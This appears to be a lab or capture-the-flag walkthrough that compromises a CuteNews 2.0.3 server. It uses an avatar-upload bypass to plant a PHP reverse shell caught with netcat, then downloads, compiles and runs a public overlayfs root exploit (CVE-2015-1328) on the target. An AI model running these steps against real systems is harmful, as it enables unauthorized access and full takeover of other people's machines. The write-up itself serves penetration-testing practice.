netdiscover
sudo netdiscover
192.168.0.27
nmap
nmap -sV 192.168.0.27
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
Port 80
http://192.168.0.27
As we can see it’s running CuteNews v.2.0.3
.
Les’t see if I can exploit it.
https://www.exploit-db.com/exploits/37474
# Exploit :
Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal
1 - Sign up for New User
2 - Log In
3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
4 - Select Upload Avatar Example: Evil.jpg
5 - use tamper data & Rename File Evil.jpg to Evil.php
-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php
I have to register first, I’m gonna use the name user1
.
Download the revershell
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
You have to change the IP address and the port.
You have to put the IP address of your computer, I always use the port 4648.
Save the file as rc.jpg
.
Tamper data exploit
Open burpsuit
.
Proxy -> intercept -> open browser:
go to this page: http://192.168.0.27/index.php?mod=main&opt=personal
You have to forward to send the Request.
Now send the file rc.jpg
in the form.
Rename the file in rc.php
.
You can close burpsuit now.
netcat
You have to listen with netcat.
nc -nlvp 4648
Now you can open the revers-shell.
Now I have a shell.
CVE-2015-1328
uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
Let’s go.
https://www.exploit-db.com/exploits/37292
I download the exploit on his computer in /tmp
.
wget https://www.exploit-db.com/download/37292 -O exp.c
Then use gcc:
gcc exp.c -o ofs
And run it.
./ofs
I’m root